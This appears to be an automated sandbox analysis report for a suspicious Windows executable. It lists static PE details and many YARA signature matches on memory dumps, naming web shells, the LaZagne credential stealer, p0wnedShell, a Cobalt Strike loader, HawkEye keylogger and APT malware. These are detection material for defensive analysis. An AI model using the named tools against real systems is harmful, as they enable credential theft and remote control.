Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02BBD470 appears 37 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02DBD470 appears 45 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02E0A840 appears 63 times

Source: GZe6EcSTpO.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: GZe6EcSTpO.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: GZe6EcSTpO.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: GZe6EcSTpO.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat date = 2014/01/28, hash4 = 3f71175985848ee46cc13282fbed2269, hash3 = 4108f28a9792b50d95f95b9e5314fa1e, hash2 = 1d912c55b96e2efe8ca873d6040e3b30, hash1 = 513b7be8bd0595c377283a7c87b44b2e, author = Florian Roth, description = Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php, score = ae025c886fbe7f9ed159f49593674832
Source: 0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, hash = 6163b30600f1e80d2bb5afaa753490b6
Source: 0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SQLMap date = 01.07.2014, author = Florian Roth, description = This signature detects the SQLMap SQL injection tool, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PortRacer author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file PortRacer.exe, hash = 2834a872a0a8da5b1be5db65dfdef388
Source: 00000013.00000003.473985141.0000000006BA5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.428708026.0000000006BA5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.436058475.0000000006B94000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_PHP_b37 date = 2014/01/28, author = Florian Roth, description = Web Shell - file b37.php, score = 0421445303cfd0ec6bc20b3846e30ff0
Source: 00000013.00000003.445137935.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: multiple_webshells_0015 hash3 = 38fd7e45f9c11a37463c3ded1c76af4c, hash2 = 09609851caa129e40b0d56e90dfc476c, hash1 = 44542e5c3e9790815c49d5f9beffbbf2, hash0 = 9c5bb5e3a46ec28039e8986324e42792, author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt, super_rule = _wacking_php_php_1_SpecialShell_99_php_php_c100_php
Source: 00000013.00000003.445137935.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Webshell_27_9_acid_c99_locus7s date = 2016-01-11, hash5 = bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96, hash4 = 07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a, hash3 = 960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668, hash2 = 7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549, author = Florian Roth, description = Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt, hash8 = ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f, hash7 = ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f, hash6 = 5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3, reference = https://github.com/nikicat/web-malware-collection, score = 2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4
Source: 00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.316101546.000000000684D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.316101546.000000000684D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: shankar_php_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file shankar.php.php.txt, hash = 6eb9db6a3974e511b7951b8f7e7136bb
Source: 0000000A.00000003.312404128.0000000006667000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FVEY_ShadowBroker_Auct_Dez16_Strings date = 2016-12-17, author = Florian Roth, description = String from the ShodowBroker Files Screenshots - Dec 2016, score = https://bit.no.com:43110/theshadowbrokers.bit/post/message6/
Source: 0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit date = 2014/01/28, author = Florian Roth, description = Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, score = c6eeacbe779518ea78b8f7ed5f63fc11
Source: 0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit author = Florian Roth, description = PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, hash = b2b797707e09c12ff5e632af84b394ad41a46fa4
Source: 00000013.00000003.464557374.0000000006D87000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000013.00000003.464557374.0000000006D87000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_h6ss date = 2014/01/28, author = Florian Roth, description = Web Shell - file h6ss.php, score = 272dde9a4a7265d6c139287560328cd5
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_Lazagne_Gen_18 date = 2018-12-11, author = Florian Roth, description = Detects Lazagne password extractor hacktool, reference = https://github.com/AlessandroZ/LaZagne, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 51121dd5fbdfe8db7d3a5311e3e9c904d644ff7221b60284c03347938577eecf
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_NoPowerShell date = 2018-12-28, hash1 = 2dad091dd00625762a7590ce16c3492cbaeb756ad0e31352a42751deb7cf9e70, author = Florian Roth, description = Detects NoPowerShell hack tool, reference = https://github.com/bitsadmin/nopowershell
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_LNX_Pnscan date = 2019-05-27, author = Florian Roth, description = Detects Pnscan port scanner, reference = https://github.com/ptrrkssn/pnscan, score =
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Netsh_PortProxy_Command date = 2019-04-20, author = Florian Roth, description = Detects a suspicious command line with netsh and the portproxy command, reference = https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy, score = 9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VUL_JQuery_FileUpload_CVE_2018_9206 date = 2018-10-19, reference3 = https://blogs.akamai.com/sitr/2018/10/having-the-security-rug-pulled-out-from-under-you.html, author = Florian Roth, description = Detects JQuery File Upload vulnerability CVE-2018-9206, reference2 = https://github.com/blueimp/jQuery-File-Upload/commit/aeb47e51c67df8a504b7726595576c1c66b5dc2f, reference = https://www.zdnet.com/article/zero-day-in-popular-jquery-plugin-actively-exploited-for-at-least-three-years/
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_FIN7_Strings_Aug18_1 date = 2018-08-01, hash1 = b6354e46af0d69b6998dbed2fceae60a3b207584e08179748e65511d45849b00, author = Florian Roth, description = Detects strings from FIN7 report in August 2018, reference = https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_FIN7_MalDoc_Aug18_1 date = 2018-08-01, hash1 = 9c12591c850a2d5355be0ed9b3891ccb3f42e37eaf979ae545f2f008b5d124d6, author = Florian Roth, description = Detects malicious Doc from FIN7 campaign, reference = https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_PowerKatz_Feb19_1 date = 2019-02-18, author = Florian Roth, description = Detetcs a tool used in the Australian Parliament House network compromise, reference = https://twitter.com/cyb3rops/status/1097423665472376832
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_Unknown_Feb19_1 date = 2019-02-18, author = Florian Roth, description = Detetcs a tool used in the Australian Parliament House network compromise, reference = https://twitter.com/cyb3rops/status/1097423665472376832
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_APT34_PS_Malware_Apr19_1 date = 2019-04-17, hash1 = b1d621091740e62c84fc8c62bcdad07873c8b61b83faba36097ef150fd6ec768, author = Florian Roth, description = Detects APT34 PowerShell malware, reference = https://twitter.com/0xffff0800/status/1118406371165126656
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_APT34_PS_Malware_Apr19_2 date = 2019-04-17, hash1 = 2943e69e6c34232dee3236ced38d41d378784a317eeaf6b90482014210fcd459, author = Florian Roth, description = Detects APT34 PowerShell malware, reference = https://twitter.com/0xffff0800/status/1118406371165126656
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_APT34_PS_Malware_Apr19_3 date = 2019-04-17, hash1 = 27e03b98ae0f6f2650f378e9292384f1350f95ee4f3ac009e0113a8d9e2e14ed, author = Florian Roth, description = Detects APT34 PowerShell malware, reference = https://twitter.com/0xffff0800/status/1118406371165126656
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_Dsniff date = 2019-02-19, author = Florian Roth, description = Detects Dsniff hack tool, score = https://goo.gl/eFoP4A
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_1 date = 2019-04-13, hash1 = d77fdabe17cdba62a8e728cbe6c740e2c2e541072501f77988674e07a05dfb39, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 0000000A.00000003.324847009.0000000006648000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FVEY_ShadowBroker_Auct_Dez16_Strings date = 2016-12-17, author = Florian Roth, description = String from the ShodowBroker Files Screenshots - Dec 2016, score = https://bit.no.com:43110/theshadowbrokers.bit/post/message6/
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_Lazagne_Gen_18 date = 2018-12-11, author = Florian Roth, description = Detects Lazagne password extractor hacktool, reference = https://github.com/AlessandroZ/LaZagne, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 51121dd5fbdfe8db7d3a5311e3e9c904d644ff7221b60284c03347938577eecf
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_NoPowerShell date = 2018-12-28, hash1 = 2dad091dd00625762a7590ce16c3492cbaeb756ad0e31352a42751deb7cf9e70, author = Florian Roth, description = Detects NoPowerShell hack tool, reference = https://github.com/bitsadmin/nopowershell
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_LNX_Pnscan date = 2019-05-27, author = Florian Roth, description = Detects Pnscan port scanner, reference = https://github.com/ptrrkssn/pnscan, score =
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Netsh_PortProxy_Command date = 2019-04-20, author = Florian Roth, description = Detects a suspicious command line with netsh and the portproxy command, reference = https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy, score = 9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VUL_JQuery_FileUpload_CVE_2018_9206 date = 2018-10-19, reference3 = https://blogs.akamai.com/sitr/2018/10/having-the-security-rug-pulled-out-from-under-you.html, author = Florian Roth, description = Detects JQuery File Upload vulnerability CVE-2018-9206, reference2 = https://github.com/blueimp/jQuery-File-Upload/commit/aeb47e51c67df8a504b7726595576c1c66b5dc2f, reference = https://www.zdnet.com/article/zero-day-in-popular-jquery-plugin-actively-exploited-for-at-least-three-years/
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_FIN7_Strings_Aug18_1 date = 2018-08-01, hash1 = b6354e46af0d69b6998dbed2fceae60a3b207584e08179748e65511d45849b00, author = Florian Roth, description = Detects strings from FIN7 report in August 2018, reference = https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_FIN7_MalDoc_Aug18_1 date = 2018-08-01, hash1 = 9c12591c850a2d5355be0ed9b3891ccb3f42e37eaf979ae545f2f008b5d124d6, author = Florian Roth, description = Detects malicious Doc from FIN7 campaign, reference = https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_PowerKatz_Feb19_1 date = 2019-02-18, author = Florian Roth, description = Detetcs a tool used in the Australian Parliament House network compromise, reference = https://twitter.com/cyb3rops/status/1097423665472376832
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_Unknown_Feb19_1 date = 2019-02-18, author = Florian Roth, description = Detetcs a tool used in the Australian Parliament House network compromise, reference = https://twitter.com/cyb3rops/status/1097423665472376832
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_APT34_PS_Malware_Apr19_1 date = 2019-04-17, hash1 = b1d621091740e62c84fc8c62bcdad07873c8b61b83faba36097ef150fd6ec768, author = Florian Roth, description = Detects APT34 PowerShell malware, reference = https://twitter.com/0xffff0800/status/1118406371165126656
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_APT34_PS_Malware_Apr19_2 date = 2019-04-17, hash1 = 2943e69e6c34232dee3236ced38d41d378784a317eeaf6b90482014210fcd459, author = Florian Roth, description = Detects APT34 PowerShell malware, reference = https://twitter.com/0xffff0800/status/1118406371165126656
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_APT34_PS_Malware_Apr19_3 date = 2019-04-17, hash1 = 27e03b98ae0f6f2650f378e9292384f1350f95ee4f3ac009e0113a8d9e2e14ed, author = Florian Roth, description = Detects APT34 PowerShell malware, reference = https://twitter.com/0xffff0800/status/1118406371165126656
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_Dsniff date = 2019-02-19, author = Florian Roth, description = Detects Dsniff hack tool, score = https://goo.gl/eFoP4A
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_1 date = 2019-04-13, hash1 = d77fdabe17cdba62a8e728cbe6c740e2c2e541072501f77988674e07a05dfb39, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 0000000A.00000003.316213218.0000000006859000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SQLMap date = 01.07.2014, author = Florian Roth, description = This signature detects the SQLMap SQL injection tool, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PortRacer author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file PortRacer.exe, hash = 2834a872a0a8da5b1be5db65dfdef388
Source: 0000000A.00000003.323605826.0000000006667000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.433232225.00000000052E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FVEY_ShadowBroker_Auct_Dez16_Strings date = 2016-12-17, author = Florian Roth, description = String from the ShodowBroker Files Screenshots - Dec 2016, score = https://bit.no.com:43110/theshadowbrokers.bit/post/message6/
Source: 00000013.00000003.413817784.00000000052A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FVEY_ShadowBroker_Auct_Dez16_Strings date = 2016-12-17, author = Florian Roth, description = String from the ShodowBroker Files Screenshots - Dec 2016, score = https://bit.no.com:43110/theshadowbrokers.bit/post/message6/
Source: 00000003.00000002.522931627.000000000237B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000003.00000002.522931627.000000000237B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: scanarator author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file scanarator.exe, hash = 848bd5a518e0b6c05bd29aceb8536c46
Source: 0000000A.00000003.324801435.0000000006627000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit date = 2014/01/28, author = Florian Roth, description = Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, score = c6eeacbe779518ea78b8f7ed5f63fc11
Source: 0000000A.00000003.324801435.0000000006627000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit author = Florian Roth, description = PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, hash = b2b797707e09c12ff5e632af84b394ad41a46fa4
Source: 00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SQLMap date = 01.07.2014, author = Florian Roth, description = This signature detects the SQLMap SQL injection tool, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PortRacer author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file PortRacer.exe, hash = 2834a872a0a8da5b1be5db65dfdef388
Source: 0000000A.00000003.318816470.000000000688B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat date = 2014/01/28, hash4 = 3f71175985848ee46cc13282fbed2269, hash3 = 4108f28a9792b50d95f95b9e5314fa1e, hash2 = 1d912c55b96e2efe8ca873d6040e3b30, hash1 = 513b7be8bd0595c377283a7c87b44b2e, author = Florian Roth, description = Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php, score = ae025c886fbe7f9ed159f49593674832
Source: 0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, hash = 6163b30600f1e80d2bb5afaa753490b6
Source: 00000013.00000003.481677976.0000000006BA6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat date = 2014/01/28, hash4 = 3f71175985848ee46cc13282fbed2269, hash3 = 4108f28a9792b50d95f95b9e5314fa1e, hash2 = 1d912c55b96e2efe8ca873d6040e3b30, hash1 = 513b7be8bd0595c377283a7c87b44b2e, author = Florian Roth, description = Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php, score = ae025c886fbe7f9ed159f49593674832
Source: 0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, hash = 6163b30600f1e80d2bb5afaa753490b6
Source: 00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SQLMap date = 01.07.2014, author = Florian Roth, description = This signature detects the SQLMap SQL injection tool, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PortRacer author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file PortRacer.exe, hash = 2834a872a0a8da5b1be5db65dfdef388
Source: 0000000A.00000003.325411258.0000000006626000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FVEY_ShadowBroker_Auct_Dez16_Strings date = 2016-12-17, author = Florian Roth, description = String from the ShodowBroker Files Screenshots - Dec 2016, score = https://bit.no.com:43110/theshadowbrokers.bit/post/message6/
